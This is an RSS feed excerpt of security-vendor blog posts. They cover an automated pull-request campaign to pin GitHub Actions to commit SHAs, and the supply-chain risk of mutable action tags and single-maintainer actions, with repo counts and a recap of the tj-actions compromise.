&lt;p&gt;&lt;strong&gt;Fork healing.&lt;/strong&gt; When a parent repo merges a fix, forks can sync the change upstream. This doesn’t happen automatically - fork maintainers need to pull the update - but the fix is at least available. Given the 590 million downstream forks in our dataset, even a small sync rate means significant reduction in the vulnerable fork population.&lt;/p&gt; 
&lt;p&gt;The PR campaign isn’t just about fixing 20,265 repos. It’s about establishing SHA pinning as the default practice across the GitHub ecosystem. Every merged PR makes the next conversation about CI/CD security a little easier.&lt;/p&gt; 
&lt;h2&gt;The Responsible Disclosure Philosophy&lt;/h2&gt; 
&lt;p&gt;Our approach to this campaign reflects a specific philosophy about security research:&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Findings without fixes are a liability.&lt;/strong&gt; Publishing “we found 192,776 vulnerabilities across 20,265 repos” without providing remediation is, at best, an academic exercise and, at worst, an attacker’s roadmap. The data is valuable because it shows the scale of the problem. The PRs are valuable because they close the gap between awareness and action.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Automation matches the scale of the problem.&lt;/strong&gt; CI/CD vulnerability patterns are systematic - they affect thousands of repos in the same way. The remediation should be equally systematic. One-on-one responsible disclosure (emailing each maintainer individually) doesn’t work at this scale. Automated PRs with full context do.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Transparency over coordination.&lt;/strong&gt; Traditional responsible disclosure involves private communication, embargo periods, and coordinated publication. That model works for zero-day vulnerabilities where advance notice gives vendors time to patch. CI/CD misconfigurations are different - they’re in public workflow files that any attacker can already see. The scan data doesn’t reveal anything that isn’t already public. What the PRs add is the fix.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;We eat our own cooking.&lt;/strong&gt; Runner Guard scans its own CI/CD pipeline. Vigilant’s repos are SHA-pinned. We’re not asking maintainers to do something we don’t do ourselves.&lt;/p&gt; 
&lt;h2&gt;The Scale Challenge&lt;/h2&gt; 
&lt;p&gt;50K repos. 14 rules. Multiple workflow files per repo. Manual remediation is impossible - which is exactly why we built the automation.&lt;/p&gt; 
&lt;p&gt;But even automated PR generation has constraints:&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;GitHub rate limits.&lt;/strong&gt; PR creation is rate-limited. Submitting PRs to 20,265 repos can’t happen in a day. The campaign will run over weeks to months, respecting rate limits and processing repos in priority order.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Maintainer fatigue.&lt;/strong&gt; If we submit 10 PRs to a single repo simultaneously (one per finding), the maintainer is more likely to close all of them than merge any. We’ll batch findings per repo into a single comprehensive PR where possible.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Bot detection.&lt;/strong&gt; GitHub’s abuse detection may flag automated PR activity. We’ll operate transparently - our bot account will be clearly labeled, and our PRs will include context about the research campaign.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Follow-up.&lt;/strong&gt; PRs that aren’t merged within a reasonable window need follow-up. Some maintainers may have questions. Some may want modifications. Some may not understand the finding. We’re committed to responding to comments and iterating on PRs - not just fire-and-forget.&lt;/p&gt; 
&lt;h2&gt;The Narrative&lt;/h2&gt; 
&lt;p&gt;“We found vulnerabilities in 2 out of 5 of GitHub’s top 50K repos. We’re not just writing about it - we’re submitting pull requests to fix them.”&lt;/p&gt; 
&lt;p&gt;That sentence is what differentiates this research from every other security scan that publishes findings and walks away. The findings are the research. The PRs are the commitment. And Runner Guard is the tool that makes both possible - free, open-source, and available to anyone who wants to run the same analysis on their own repos.&lt;/p&gt; 
&lt;h2&gt;What Happens If Nobody Fixes These&lt;/h2&gt; 
&lt;p&gt;The data paints a clear picture of the alternative: if the ecosystem doesn’t address these findings, the &lt;a href="https://www.vigilantdefense.com/research/cicd-chain-attack-anatomy-recon-to-exfiltration"&gt;chain attack model&lt;/a&gt; we documented becomes increasingly viable at scale.&lt;/p&gt; 
&lt;p&gt;The 2020 inflection in our &lt;a href="https://www.vigilantdefense.com/research/github-top-50k-repos-cicd-security-scan"&gt;pillar data&lt;/a&gt; shows the trend is getting worse, not better. Repos created in 2025 have a 59.4% vulnerability rate - the highest in the dataset. New projects are inheriting vulnerable CI/CD patterns from templates, documentation examples, and community convention. Without intervention, the vulnerability rate will continue to rise.&lt;/p&gt; 
&lt;p&gt;The &lt;a href="https://www.vigilantdefense.com/research/ai-agents-cicd-supply-chain-force-multipliers"&gt;AI force multiplier&lt;/a&gt; compresses the timeline for exploitation. What was a sophisticated, human-paced attack becomes automated and scalable. The gap between the scale of exposed CI/CD pipelines and the effort required to exploit them shrinks as AI lowers the skill barrier.&lt;/p&gt; 
&lt;p&gt;The zombie repos (809 archived, 6.5M forks) represent the permanent damage - vulnerabilities that will propagate indefinitely because the maintainers are gone. Every day that passes without fixing active repos adds more repos to the zombie population as maintainers lose interest, change jobs, or move on. The abandoned-repo count only grows.&lt;/p&gt; 
&lt;p&gt;This isn’t alarmist - it’s arithmetic. The attack surface is expanding. The tools to exploit it are improving. The fixes are straightforward and available today. The PR campaign is our attempt to shift the trajectory before the next major CI/CD supply chain incident demonstrates the cost of inaction.&lt;/p&gt; 
&lt;h2&gt;What Comes Next&lt;/h2&gt; 
&lt;p&gt;This article will be updated as the PR campaign progresses with:&lt;/p&gt; 
&lt;ul&gt; 
 &lt;li&gt;&lt;strong&gt;Total PRs submitted&lt;/strong&gt; - running count across all tiers&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;Acceptance/merge rate&lt;/strong&gt; - what percentage of PRs are merged&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;Average time-to-merge&lt;/strong&gt; - how quickly maintainers respond&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;Most responsive communities&lt;/strong&gt; - which language ecosystems merge fastest&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;Before/after&lt;/strong&gt; - vulnerability rates for repos that merged vs. didn’t&lt;/li&gt; 
&lt;/ul&gt; 
&lt;p&gt;The data will tell us something about the open-source ecosystem’s appetite for CI/CD security. Are maintainers aware of these risks? Are they receptive to automated fixes? Do certain communities move faster than others?&lt;/p&gt; 
&lt;p&gt;We’ll publish follow-up analyses as the data accumulates. The scan was the starting point. The PRs are the intervention. The response is the next dataset.&lt;/p&gt; 
&lt;h2&gt;Run It Yourself&lt;/h2&gt; 
&lt;p&gt;The same pipeline powering our 50K-repo campaign is available to anyone:&lt;/p&gt; 
&lt;pre class="highlight"&gt;&lt;code class="language-bash"&gt;# Install
brew install Vigilant-LLC/tap/runner-guard

# Scan
runner-guard scan .

# Fix
runner-guard fix .

# Review the diff and commit
git diff
git add .github/workflows/
git commit -m "Pin GitHub Actions to SHA hashes"
&lt;/code&gt;&lt;/pre&gt; 
&lt;p&gt;For organizations, Runner Guard integrates into CI/CD as a GitHub Action itself - scanning your workflows on every change to prevent new vulnerabilities from being introduced. The &lt;a href="https://www.vigilantdefense.com/research/fix-cicd-security-sha-pinning-least-privilege"&gt;Fix It guide&lt;/a&gt; covers the full setup.&lt;/p&gt;  
&lt;div class="v-related"&gt; 
 &lt;h2&gt;Related Articles&lt;/h2&gt; 
 &lt;ul&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/github-top-50k-repos-cicd-security-scan"&gt;We Scanned GitHub’s Top 50K Repos - Here’s What We Found&lt;/a&gt;&lt;/li&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/supply-chain-crisis-unpinned-github-actions"&gt;The Software Supply Chain Crisis - 74.5% of Findings Are Unpinned Actions&lt;/a&gt;&lt;/li&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/fix-cicd-security-sha-pinning-least-privilege"&gt;Fix It - SHA Pinning, Least Privilege, and the 5-Minute Security Upgrade&lt;/a&gt;&lt;/li&gt; 
 &lt;/ul&gt; 
&lt;/div&gt;  
&lt;p&gt;&lt;strong&gt;Start with a scan. Stay with continuous monitoring.&lt;/strong&gt;&lt;/p&gt; 
&lt;p&gt;&lt;a href="https://www.vigilantdefense.com/resources/runner-guard"&gt;Runner Guard&lt;/a&gt; gives you the one-time scan - free, open-source, 14 security rules. For continuous CI/CD pipeline monitoring across your entire vendor chain, &lt;a href="https://vigilantcybersecurity.com/threatcert"&gt;ThreatCert&lt;/a&gt; runs every 60 minutes, correlating CI/CD findings with 6 other intelligence domains.&lt;/p&gt; 
&lt;pre class="highlight"&gt;&lt;code class="language-bash"&gt;brew install Vigilant-LLC/tap/runner-guard
runner-guard scan github.com/owner/repo
&lt;/code&gt;&lt;/pre&gt; 
&lt;div class="v-cta-buttons"&gt;
 &lt;a href="https://github.com/Vigilant-LLC/runner-guard" class="v-btn v-btn-primary"&gt;Install Runner Guard&lt;/a&gt;
 &lt;a href="https://vigilantcybersecurity.com/threatcert" class="v-btn v-btn-secondary"&gt;See ThreatCert&lt;/a&gt;
 &lt;a href="https://www.vigilantdefense.com" class="v-btn v-btn-secondary"&gt;Learn More About Vigilant&lt;/a&gt;
&lt;/div&gt;   
&lt;img src="https://track.hubspot.com/__ptq.gif?a=45116655&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fvigilantdefense.com%2Fresearch%2Ffixing-50k-repos-automated-pull-requests&amp;amp;bu=https%253A%252F%252Fvigilantdefense.com%252Fresearch&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>Github</category>
      <category>CICD</category>
      <pubDate>Tue, 24 Mar 2026 18:21:44 GMT</pubDate>
      <author>sales@vigilantnow.com (Chris Nyhuis)</author>
      <guid>https://vigilantdefense.com/research/fixing-50k-repos-automated-pull-requests</guid>
      <dc:date>2026-03-24T18:21:44Z</dc:date>
    </item>
    <item>
      <title>The Software Supply Chain Crisis — 74.5% of Findings Are Unpinned Actions</title>
      <link>https://vigilantdefense.com/research/supply-chain-crisis-unpinned-github-actions</link>
      <description>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://vigilantdefense.com/research/supply-chain-crisis-unpinned-github-actions" title="" class="hs-featured-image-link"&gt; &lt;img src="https://vigilantdefense.com/hubfs/articles/cicd-research/images/06-top-unpinned-actions.png" alt="The Software Supply Chain Crisis — 74.5% of Findings Are Unpinned Actions" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;div&gt; 
 &lt;div style="font-weight: bold; font-size: 1rem; color: #07161d;"&gt;
   Chris Nyhuis 
 &lt;/div&gt; 
 &lt;div style="font-size: 0.85rem; color: #6b7280; font-weight: 500;"&gt;
   CEO, Vigilant 
 &lt;/div&gt; 
 &lt;div style="font-size: 0.8rem; color: #9ca3af; font-weight: 500;"&gt;
   10 min read 
 &lt;/div&gt; 
&lt;/div&gt;</description>
      <content:encoded>&lt;div&gt; 
 &lt;div style="font-weight: bold; font-size: 1rem; color: #07161d;"&gt;
  Chris Nyhuis
 &lt;/div&gt; 
 &lt;div style="font-size: 0.85rem; color: #6b7280; font-weight: 500;"&gt;
  CEO, Vigilant
 &lt;/div&gt; 
 &lt;div style="font-size: 0.8rem; color: #9ca3af; font-weight: 500;"&gt;
  10 min read
 &lt;/div&gt; 
&lt;/div&gt; 
&lt;div style="font-size: 0.85rem; color: #00a19b; font-style: italic; margin-bottom: 1.5rem;"&gt;
 Part of a 9-part research series on CI/CD pipeline security. 
 &lt;a href="#related-articles" style="color: #ff5d2c; text-decoration: none;"&gt;See all articles below.&lt;/a&gt;
&lt;/div&gt; 
&lt;blockquote&gt; 
 &lt;p&gt;Three-quarters of every CI/CD security finding in GitHub’s top 50K repos comes down to a single mistake: trusting a version tag that anyone with push access can silently move.&lt;/p&gt; 
&lt;/blockquote&gt; 
&lt;h2&gt;The Setup&lt;/h2&gt; 
&lt;p&gt;When we &lt;a href="https://www.vigilantdefense.com/research/github-top-50k-repos-cicd-security-scan"&gt;scanned 50,012 of GitHub’s most-starred repositories&lt;/a&gt; for CI/CD vulnerabilities, one rule dominated everything else. RGS-007 - unpinned third-party actions - accounted for 143,616 of 192,776 total findings. That’s 74.5%. Not a plurality. A supermajority.&lt;/p&gt; 
&lt;p&gt;The finding is deceptively simple. A GitHub Actions workflow references a third-party action using a mutable version tag - &lt;code&gt;uses: actions/checkout@v4&lt;/code&gt; - instead of pinning to an immutable SHA hash - &lt;code&gt;uses: actions/checkout@b4ffde65f46...&lt;/code&gt;. The version tag &lt;code&gt;@v4&lt;/code&gt; is a Git tag. Any maintainer with push access to that repository can move it to point at different code. The SHA hash is a specific commit. It cannot be changed.&lt;/p&gt; 
&lt;p&gt;This distinction - mutable versus immutable - is the fault line that the entire CI/CD supply chain runs across. 19,005 repositories in our dataset are on the wrong side of it.&lt;/p&gt; 
&lt;h2&gt;What Mutable Tags Actually Mean&lt;/h2&gt; 
&lt;p&gt;When you write &lt;code&gt;uses: docker/login-action@v3&lt;/code&gt; in a workflow, you’re making a trust decision. You’re saying: “I trust that whoever controls the &lt;code&gt;v3&lt;/code&gt; tag on the docker/login-action repository will only ever point it at code I’d approve.” That trust extends indefinitely, through every future modification of that tag, without any notification or approval process on your end.&lt;/p&gt; 
&lt;p&gt;A SHA pin - &lt;code&gt;uses: docker/login-action@74a8a23...&lt;/code&gt; - says something different. It says: “Run this exact code, this exact commit, nothing else.” If the action maintainer pushes a new version, your workflow keeps running the code you reviewed. You upgrade deliberately, not automatically.&lt;/p&gt; 
&lt;p&gt;The difference matters because of how GitHub Actions executes workflows. When a CI pipeline triggers, GitHub resolves the action reference at runtime. A mutable tag resolves to whatever commit it points to right now. If an attacker compromises the maintainer’s account and moves the tag to a malicious commit at 2 AM, every workflow that triggers after that moment runs the attacker’s code. No pull request. No code review. No notification.&lt;/p&gt; 
&lt;p&gt;This is exactly what happened with tj-actions/changed-files in March 2025. A maintainer account was compromised, the tag was moved to a malicious commit, and every repository using the action ran the compromised code on their next CI trigger. The attack extracted CI secrets - GITHUB_TOKEN, AWS credentials, NPM tokens - from every affected pipeline.&lt;/p&gt; 
&lt;h2&gt;The Most Commonly Unpinned Actions&lt;/h2&gt; 
&lt;p&gt;Here’s where 19,005 repositories are placing their trust:&lt;/p&gt; 
&lt;img src="https://vigilantdefense.com/hubfs/articles/cicd-research/images/06-top-unpinned-actions.png" alt="Top Unpinned Actions - Most Commonly Unpinned GitHub Actions" style="max-width: 100%; border-radius: 8px;"&gt; 
&lt;table&gt; 
 &lt;thead&gt; 
  &lt;tr&gt; 
   &lt;th&gt;Action&lt;/th&gt; 
   &lt;th&gt;Repos&lt;/th&gt; 
   &lt;th&gt;Findings&lt;/th&gt; 
  &lt;/tr&gt; 
 &lt;/thead&gt; 
 &lt;tbody&gt; 
  &lt;tr&gt; 
   &lt;td&gt;docker/login-action@v3&lt;/td&gt; 
   &lt;td&gt;1,848&lt;/td&gt; 
   &lt;td&gt;5,099&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;docker/setup-buildx-action@v3&lt;/td&gt; 
   &lt;td&gt;1,845&lt;/td&gt; 
   &lt;td&gt;4,258&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;softprops/action-gh-release@v2&lt;/td&gt; 
   &lt;td&gt;1,405&lt;/td&gt; 
   &lt;td&gt;2,065&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;ruby/setup-ruby@v1&lt;/td&gt; 
   &lt;td&gt;1,275&lt;/td&gt; 
   &lt;td&gt;2,793&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;docker/setup-qemu-action@v3&lt;/td&gt; 
   &lt;td&gt;1,181&lt;/td&gt; 
   &lt;td&gt;2,038&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;shivammathur/setup-php@v2&lt;/td&gt; 
   &lt;td&gt;1,147&lt;/td&gt; 
   &lt;td&gt;2,916&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;docker/build-push-action@v6&lt;/td&gt; 
   &lt;td&gt;1,090&lt;/td&gt; 
   &lt;td&gt;2,665&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;dtolnay/rust-toolchain@stable&lt;/td&gt; 
   &lt;td&gt;989&lt;/td&gt; 
   &lt;td&gt;3,805&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;codecov/codecov-action@v5&lt;/td&gt; 
   &lt;td&gt;947&lt;/td&gt; 
   &lt;td&gt;1,447&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;docker/metadata-action@v5&lt;/td&gt; 
   &lt;td&gt;900&lt;/td&gt; 
   &lt;td&gt;1,734&lt;/td&gt; 
  &lt;/tr&gt; 
 &lt;/tbody&gt; 
&lt;/table&gt; 
&lt;p&gt;Docker actions dominate the top of the list - five of the top ten most commonly unpinned actions belong to a single organization. We explore this concentration risk in depth in &lt;a href="https://www.vigilantdefense.com/research/docker-chokepoint-github-actions-supply-chain"&gt;The Docker Chokepoint&lt;/a&gt;.&lt;/p&gt; 
&lt;p&gt;But the pattern below Docker is what reveals the structural problem: action-gh-release, setup-ruby, setup-php, codecov-action, rust-toolchain. Several of these are maintained by single GitHub accounts - one person standing between the open-source ecosystem and a supply chain compromise.&lt;/p&gt; 
&lt;h2&gt;The Trust Paradox in the Supply Chain&lt;/h2&gt; 
&lt;p&gt;The organizations developers trust most aren’t immune to this problem - they’re often the worst offenders. In our &lt;a href="https://www.vigilantdefense.com/research/github-top-50k-repos-cicd-security-scan"&gt;pillar research&lt;/a&gt;, we found that a major Java framework organization has a 92.9% vulnerability rate - 26 of 28 repos running unpinned actions. A major OSS foundation sits at 65.1% across 172 repos. A major social media company at 66.2%.&lt;/p&gt; 
&lt;p&gt;This isn’t negligence. It’s a function of scale. Larger organizations run more complex CI/CD - multi-stage builds, matrix testing across platforms, release automation with credential access, deployment pipelines spanning multiple cloud providers. Each additional build step adds action dependencies. Each dependency is another mutable trust decision.&lt;/p&gt; 
&lt;p&gt;The counterintuitive result: organizations with the resources to do security well have the most exposed CI/CD pipelines precisely because they have the most complex CI/CD pipelines. The brand name on a GitHub organization isn’t a security guarantee for the actions it produces - or consumes.&lt;/p&gt; 
&lt;h2&gt;The Single-Maintainer Problem&lt;/h2&gt; 
&lt;p&gt;Beyond Docker (an organization with corporate security practices), the biggest supply chain risks in our dataset trace to actions maintained by a single GitHub account. One compromised account equals hundreds of compromised repositories:&lt;/p&gt; 
&lt;img src="https://vigilantdefense.com/hubfs/articles/cicd-research/images/07-single-maintainer-risk.png" alt="Supply Chain Concentration - Single-Maintainer Actions" style="max-width: 100%; border-radius: 8px;"&gt; 
&lt;table&gt; 
 &lt;thead&gt; 
  &lt;tr&gt; 
   &lt;th&gt;Action&lt;/th&gt; 
   &lt;th&gt;Repos Affected&lt;/th&gt; 
   &lt;th&gt;Versions&lt;/th&gt; 
   &lt;th&gt;Role&lt;/th&gt; 
  &lt;/tr&gt; 
 &lt;/thead&gt; 
 &lt;tbody&gt; 
  &lt;tr&gt; 
   &lt;td&gt;action-gh-release&lt;/td&gt; 
   &lt;td&gt;1,405&lt;/td&gt; 
   &lt;td&gt;14&lt;/td&gt; 
   &lt;td&gt;The dominant release publishing action&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;setup-php&lt;/td&gt; 
   &lt;td&gt;1,147&lt;/td&gt; 
   &lt;td&gt;8&lt;/td&gt; 
   &lt;td&gt;The PHP setup action&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;rust-toolchain&lt;/td&gt; 
   &lt;td&gt;989&lt;/td&gt; 
   &lt;td&gt;44&lt;/td&gt; 
   &lt;td&gt;The dominant Rust CI dependency&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;create-pull-request&lt;/td&gt; 
   &lt;td&gt;353&lt;/td&gt; 
   &lt;td&gt;59&lt;/td&gt; 
   &lt;td&gt;Popular PR automation action&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;rust-cache&lt;/td&gt; 
   &lt;td&gt;198&lt;/td&gt; 
   &lt;td&gt;8&lt;/td&gt; 
   &lt;td&gt;Rust build cache action&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;release-action&lt;/td&gt; 
   &lt;td&gt;136&lt;/td&gt; 
   &lt;td&gt;8&lt;/td&gt; 
   &lt;td&gt;Alternative release publishing&lt;/td&gt; 
  &lt;/tr&gt; 
 &lt;/tbody&gt; 
&lt;/table&gt; 
&lt;p&gt;To be clear: the maintainers behind these actions have built critical infrastructure that the open-source ecosystem depends on daily. That work is often unpaid, under-recognized, and carried out over years of sustained effort. The problem isn’t the people - it’s the structural reality that thousands of CI/CD pipelines depend on a single account with no organizational redundancy, no succession plan, and no security budget. The ecosystem built a single point of failure around their generosity.&lt;/p&gt; 
&lt;p&gt;&lt;code&gt;action-gh-release&lt;/code&gt; is the most popular release publishing action on GitHub. 1,405 repositories in our dataset use it with mutable tags - all maintained by a single account. A single compromised credential would inject malicious code into the release pipelines of over a thousand of the world’s most popular projects. The release pipeline is where binaries get built, signed, and published - it’s the highest-value target in the entire CI/CD chain.&lt;/p&gt; 
&lt;p&gt;&lt;code&gt;rust-toolchain&lt;/code&gt; is effectively Rust’s CI infrastructure. 989 repos depend on it across 44 unique mutable references - &lt;code&gt;@stable&lt;/code&gt;, &lt;code&gt;@master&lt;/code&gt;, &lt;code&gt;@nightly&lt;/code&gt;, &lt;code&gt;@v1&lt;/code&gt;, plus dozens of specific version strings. 201 repos pin to &lt;code&gt;@master&lt;/code&gt;, meaning every single push to the repository immediately executes new, unreviewed code in 201 CI pipelines. Combined with &lt;code&gt;rust-cache&lt;/code&gt; at 198 repos, two single-maintainer actions control the CI pipelines of most Rust open-source projects.&lt;/p&gt; 
&lt;p&gt;&lt;code&gt;create-pull-request&lt;/code&gt; spans 59 unique action references across 353 repos, with version sprawl from v3 through v8. It appears in 203 repos across 6 major versions - all unpinned, all mutable.&lt;/p&gt; 
&lt;p&gt;These aren’t hypothetical risks. The tj-actions/changed-files compromise in March 2025 was a single-maintainer action. The attack vector was the maintainer’s account, not a software vulnerability. The action’s code was fine. The credentials weren’t.&lt;/p&gt; 
&lt;h2&gt;Version Sprawl - The Hidden Multiplier&lt;/h2&gt; 
&lt;p&gt;The attack surface for a single action isn’t one version tag. It’s dozens.&lt;/p&gt; 
&lt;table&gt; 
 &lt;thead&gt; 
  &lt;tr&gt; 
   &lt;th&gt;Action&lt;/th&gt; 
   &lt;th&gt;Unique Refs&lt;/th&gt; 
   &lt;th&gt;Top Versions&lt;/th&gt; 
   &lt;th&gt;Worst Ref&lt;/th&gt; 
  &lt;/tr&gt; 
 &lt;/thead&gt; 
 &lt;tbody&gt; 
  &lt;tr&gt; 
   &lt;td&gt;dtolnay/rust-toolchain&lt;/td&gt; 
   &lt;td&gt;&lt;strong&gt;44&lt;/strong&gt;&lt;/td&gt; 
   &lt;td&gt;@stable (481), @master (201), @nightly (115)&lt;/td&gt; 
   &lt;td&gt;@master - 201 repos on HEAD&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;codecov/codecov-action&lt;/td&gt; 
   &lt;td&gt;&lt;strong&gt;35&lt;/strong&gt;&lt;/td&gt; 
   &lt;td&gt;@v5 (500), @v4 (204), @v3 (138)&lt;/td&gt; 
   &lt;td&gt;35 separate mutable trust points&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;docker/build-push-action&lt;/td&gt; 
   &lt;td&gt;&lt;strong&gt;28&lt;/strong&gt;&lt;/td&gt; 
   &lt;td&gt;@v6 (610), @v5 (291), @v4 (128)&lt;/td&gt; 
   &lt;td&gt;@master - 3 repos + EOL versions&lt;/td&gt; 
  &lt;/tr&gt; 
 &lt;/tbody&gt; 
&lt;/table&gt; 
&lt;p&gt;An attacker doesn’t need to compromise the latest version. Any mutable ref is a valid target. Old versions are less monitored but still actively used - 85 repos still run &lt;code&gt;codecov/codecov-action@v1&lt;/code&gt;. And refs that look specific, like &lt;code&gt;@v5.5.2&lt;/code&gt;, create an illusion of pinning. They’re still mutable tags, not SHAs. The version number is a label, not a guarantee.&lt;/p&gt; 
&lt;p&gt;No maintainer is tracking or auditing all 28 to 44 mutable refs to their action. A compromised old tag could go unnoticed for months.&lt;/p&gt; 
&lt;h2&gt;The @master/@main Problem&lt;/h2&gt; 
&lt;p&gt;Version tags like &lt;code&gt;@v3&lt;/code&gt; can theoretically be moved, but in practice rarely are outside of an attack. Branch refs like &lt;code&gt;@master&lt;/code&gt; and &lt;code&gt;@main&lt;/code&gt; move with literally every commit. They are the most dangerous form of unpinned action reference - zero stability guarantee, maximum exposure.&lt;/p&gt; 
&lt;table&gt; 
 &lt;thead&gt; 
  &lt;tr&gt; 
   &lt;th&gt;Action&lt;/th&gt; 
   &lt;th&gt;Repos on @master/@main&lt;/th&gt; 
   &lt;th&gt;Risk&lt;/th&gt; 
  &lt;/tr&gt; 
 &lt;/thead&gt; 
 &lt;tbody&gt; 
  &lt;tr&gt; 
   &lt;td&gt;dtolnay/rust-toolchain&lt;/td&gt; 
   &lt;td&gt;201&lt;/td&gt; 
   &lt;td&gt;Rust ecosystem - changes with every push, single person&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;ad-m/github-push-action&lt;/td&gt; 
   &lt;td&gt;49&lt;/td&gt; 
   &lt;td&gt;&lt;strong&gt;Pushes code&lt;/strong&gt; - direct write access to downstream repos&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;google/oss-fuzz (run_fuzzers)&lt;/td&gt; 
   &lt;td&gt;44&lt;/td&gt; 
   &lt;td&gt;Security fuzzing infrastructure&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;google/oss-fuzz (build_fuzzers)&lt;/td&gt; 
   &lt;td&gt;43&lt;/td&gt; 
   &lt;td&gt;Security fuzzing infrastructure&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;jlumbroso/free-disk-space&lt;/td&gt; 
   &lt;td&gt;41&lt;/td&gt; 
   &lt;td&gt;Runs as root to free disk space&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;coverallsapp/github-action&lt;/td&gt; 
   &lt;td&gt;40&lt;/td&gt; 
   &lt;td&gt;Code coverage - accesses repo content&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;aquasecurity/trivy-action&lt;/td&gt; 
   &lt;td&gt;19&lt;/td&gt; 
   &lt;td&gt;Vulnerability scanner pinned to master&lt;/td&gt; 
  &lt;/tr&gt; 
 &lt;/tbody&gt; 
&lt;/table&gt; 
&lt;p&gt;&lt;code&gt;ad-m/github-push-action@master&lt;/code&gt; deserves special attention. 49 repos use it to push code directly to their own repository. This action has write access by design - it exists to modify your repo. Pinned to master. Every commit to that action’s repository immediately executes in 49 of GitHub’s top projects with full write access to those projects’ code.&lt;/p&gt; 
&lt;h2&gt;Security Scanners Running Unpinned&lt;/h2&gt; 
&lt;p&gt;The most ironic finding in the dataset:&lt;/p&gt; 
&lt;table&gt; 
 &lt;thead&gt; 
  &lt;tr&gt; 
   &lt;th&gt;Action&lt;/th&gt; 
   &lt;th&gt;Repos&lt;/th&gt; 
   &lt;th&gt;Pinned To&lt;/th&gt; 
  &lt;/tr&gt; 
 &lt;/thead&gt; 
 &lt;tbody&gt; 
  &lt;tr&gt; 
   &lt;td&gt;google/oss-fuzz&lt;/td&gt; 
   &lt;td&gt;44&lt;/td&gt; 
   &lt;td&gt;&lt;code&gt;@master&lt;/code&gt;&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;coverallsapp/github-action&lt;/td&gt; 
   &lt;td&gt;40&lt;/td&gt; 
   &lt;td&gt;&lt;code&gt;@master&lt;/code&gt;&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;aquasecurity/trivy-action&lt;/td&gt; 
   &lt;td&gt;19&lt;/td&gt; 
   &lt;td&gt;&lt;code&gt;@master&lt;/code&gt;&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;trufflesecurity/trufflehog&lt;/td&gt; 
   &lt;td&gt;8&lt;/td&gt; 
   &lt;td&gt;&lt;code&gt;@main&lt;/code&gt;&lt;/td&gt; 
  &lt;/tr&gt; 
 &lt;/tbody&gt; 
&lt;/table&gt; 
&lt;p&gt;Trivy - Aqua Security’s vulnerability scanner - and TruffleHog - a secret scanner - are pinned to &lt;code&gt;@master&lt;/code&gt; and &lt;code&gt;@main&lt;/code&gt; respectively. Tools designed to detect security issues, deployed in the most insecure way possible. A compromise of either repository would inject malicious code into the security scanning step of dozens of top repos. The scanner becomes the attack vector.&lt;/p&gt; 
&lt;h2&gt;The Recursive Supply Chain&lt;/h2&gt; 
&lt;p&gt;We identified 187 repos in our dataset that are themselves GitHub Actions - installable components consumed by other repositories’ workflows. 145 of them - 77.5% - have their own CI/CD vulnerabilities.&lt;/p&gt; 
